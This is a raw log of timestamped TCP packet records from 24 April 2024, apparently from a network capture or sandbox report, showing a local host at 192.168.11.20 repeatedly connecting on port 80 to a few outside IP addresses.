                                                                    Apr 24, 2024 12:30:11.662743092 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:11.664141893 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:11.905589104 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210313082 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210330009 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210355043 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210366964 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210479021 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210596085 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210606098 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210643053 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:12.210786104 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:13.166842937 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.184370041 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.425746918 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.425915956 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.427356958 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.668682098 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935365915 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935463905 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935475111 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935487032 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935586929 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935596943 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935688972 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935734034 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.935902119 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.935902119 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.935902119 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:15.931885958 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:16.949397087 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.190910101 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.191081047 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.193630934 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.193727970 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.435336113 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.435422897 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.435466051 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.435544014 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.435734034 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.435858011 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.436364889 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.436556101 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.677226067 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677300930 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677428007 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677469015 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.677551985 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677617073 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.677727938 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677809000 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.677911997 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677977085 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.678081989 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.678219080 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.678364992 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.678550005 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.918950081 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.918962002 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.919044971 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.919270039 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.919277906 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.919548035 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:18.696933985 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:18.977432013 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.714399099 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.747643948 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.747764111 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.747822046 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.747903109 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.747929096 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748059988 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.748071909 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.748096943 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748131037 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.748140097 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.748243093 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748269081 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748269081 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748269081 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.955838919 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.956012964 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.957406044 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:20.198682070 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:20.464931011 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:20.464942932 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:20.465323925 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:20.467170000 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:20.708446980 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:25.795216084 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:26.064095974 CEST8050274137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:26.064244986 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:26.065649033 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:26.334134102 CEST8050274137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:26.334211111 CEST8050274137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:26.334220886 CEST8050274137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:26.334414959 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:27.569942951 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:28.587435961 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:28.856321096 CEST8050275137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:28.856447935 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:28.857877970 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:29.126668930 CEST8050275137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:29.126777887 CEST8050275137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:29.126787901 CEST8050275137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:29.126981974 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:30.366166115 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.383706093 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.659266949 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.659527063 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.662067890 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.662153959 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.937657118 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937724113 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937732935 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937844038 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937854052 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937905073 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.937963963 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.937967062 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.938009977 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.938051939 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.938353062 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.978245020 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.978468895 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:32.213320971 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213334084 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213382006 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213390112 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213397980 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213485956 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213562012 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:32.213618994 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:32.213622093 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213665009 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:32.213782072 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213789940 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213798046 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.213833094 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:32.213871956 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.214027882 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.253783941 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.253792048 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.489331961 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.489342928 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.489434004 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.489558935 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.489567995 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:32.489856005 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:33.178138971 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:34.195739031 CEST5027780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:34.464648962 CEST8050277137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:34.464823008 CEST5027780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:34.466295958 CEST5027780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:34.735162020 CEST8050277137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:34.735280037 CEST8050277137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:34.735398054 CEST8050277137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:34.735596895 CEST5027780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:34.737499952 CEST5027780192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:35.006308079 CEST8050277137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:40.032763958 CEST5027880192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:40.345287085 CEST805027891.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:40.345455885 CEST5027880192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:40.346885920 CEST5027880192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:40.660209894 CEST805027891.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:40.660285950 CEST805027891.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:40.660430908 CEST5027880192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:41.848098040 CEST5027880192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:42.865576982 CEST5027980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:43.175754070 CEST805027991.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:43.175945044 CEST5027980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:43.177387953 CEST5027980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:43.488382101 CEST805027991.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:43.488394976 CEST805027991.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:43.488614082 CEST5027980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:44.691201925 CEST5027980192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:45.708730936 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.018861055 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.019109011 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.021651030 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.021708965 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.021760941 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.332334995 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.332412004 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.332530975 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.332577944 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.332634926 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.332806110 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.333102942 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.378230095 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.642807007 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.642888069 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.642896891 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.642946005 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.643008947 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.643014908 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.643105984 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.643115044 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.643234968 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:46.643269062 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.953207970 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.953344107 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.953480005 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.953603029 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.953610897 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.953707933 CEST805028091.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:46.953906059 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:47.534282923 CEST5028080192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:48.551827908 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:48.862488985 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:48.862696886 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:48.864064932 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:49.215609074 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435338020 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435353041 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435432911 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435444117 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435455084 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435466051 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435511112 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435595989 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435605049 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435666084 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:49.435667992 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.435834885 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:49.436011076 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:49.745836973 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.745851040 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.745907068 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.745963097 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.745975018 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.745985031 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.745996952 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.746031046 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.746083975 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.746095896 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:49.746130943 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:49.746299982 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:49.746469975 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:49.748332024 CEST5028180192.168.11.2091.195.240.19
                                                                    Apr 24, 2024 12:30:50.058346033 CEST805028191.195.240.19192.168.11.20
                                                                    Apr 24, 2024 12:30:54.961647987 CEST5028280192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:55.274400949 CEST805028291.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:30:55.274563074 CEST5028280192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:55.275985956 CEST5028280192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:55.589925051 CEST805028291.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:30:55.589936972 CEST805028291.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:30:55.590147972 CEST5028280192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:56.782212973 CEST5028280192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:57.799796104 CEST5028380192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:58.111179113 CEST805028391.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:30:58.111423016 CEST5028380192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:58.112905025 CEST5028380192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:58.423721075 CEST805028391.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:30:58.423732996 CEST805028391.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:30:58.423847914 CEST5028380192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:30:59.625441074 CEST5028380192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:00.642919064 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:00.953124046 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:00.953313112 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:00.955851078 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:00.955909967 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:00.955967903 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.266138077 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.266155958 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.266185999 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.266194105 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.266201973 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.266340971 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.266360044 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.266391039 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.266446114 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.266453028 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.266606092 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.266772985 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.267988920 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.312482119 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.576591969 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.576709032 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.576718092 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.576745987 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.576808929 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.576822042 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.576858997 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.576992989 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.577002048 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.577024937 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:01.577083111 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.618005991 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.886955023 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.887304068 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.887315035 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.887435913 CEST805028491.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:01.887599945 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:02.468517065 CEST5028480192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:03.486047983 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:03.796037912 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:03.796153069 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:03.797589064 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.148361921 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.284794092 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.284868956 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.284929037 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.284982920 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.285037041 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.285084963 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.285139084 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.285170078 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.285170078 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.285195112 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.285249949 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.285305023 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.285510063 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.285587072 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.595498085 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595582008 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595593929 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595604897 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595664024 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595674992 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595685959 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595696926 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595707893 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595717907 CEST805028591.195.240.123192.168.11.20
                                                                    Apr 24, 2024 12:31:04.595851898 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.595851898 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.596019983 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.597944021 CEST5028580192.168.11.2091.195.240.123
                                                                    Apr 24, 2024 12:31:04.908091068 CEST805028591.195.240.123192.168.11.20
